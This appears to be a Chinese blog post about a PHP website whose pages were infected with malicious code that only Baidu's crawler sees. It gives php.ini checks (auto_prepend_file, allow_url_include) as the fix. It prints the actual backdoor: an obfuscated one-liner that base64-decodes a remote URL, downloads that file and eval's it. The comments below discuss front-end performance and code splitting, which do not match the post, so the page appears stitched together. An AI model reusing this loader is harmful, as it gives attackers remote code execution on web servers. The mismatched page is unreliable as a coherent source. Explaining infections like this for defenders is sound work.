2025-05-19 11:29:44 • 286

PHP网站全部被挂马，而且只有百度爬虫才能看到恶意代码

探索者

解决办法：

1.查看auto_prepend_file：auto_prepend_file = 这里必须是空，如果引用文件，说明这个文件有问题

2. 查看allow_url_include：allow_url_include = Off 状态必须是Off

我的是在根目录/tmp/下面加了mysqlsock的文件，内容如下：

<?php ini_set("display_errors", "off");eval('?>'.file_get_contents(base64_decode('aHR0cDovL2pqc3MubXJ0MzEuY29tL3gvd3dqc2Njcy50eHQ=')));?>

代码结束，下面是正确php.ini正常设置

2025-06-16

非常实用的文章，我学到了很多关于前端性能优化的知识。特别是缓存策略部分，对我帮助很大。

2025-06-15

代码分割确实是提高前端性能的重要手段，请问作者有没有实际项目中遇到的代码分割最佳实践可以分享？

2025-06-16

感谢提问！在实际项目中，我通常会根据路由、组件和第三方库进行代码分割。对于大型组件库，可以考虑使用动态导入来实现按需加载。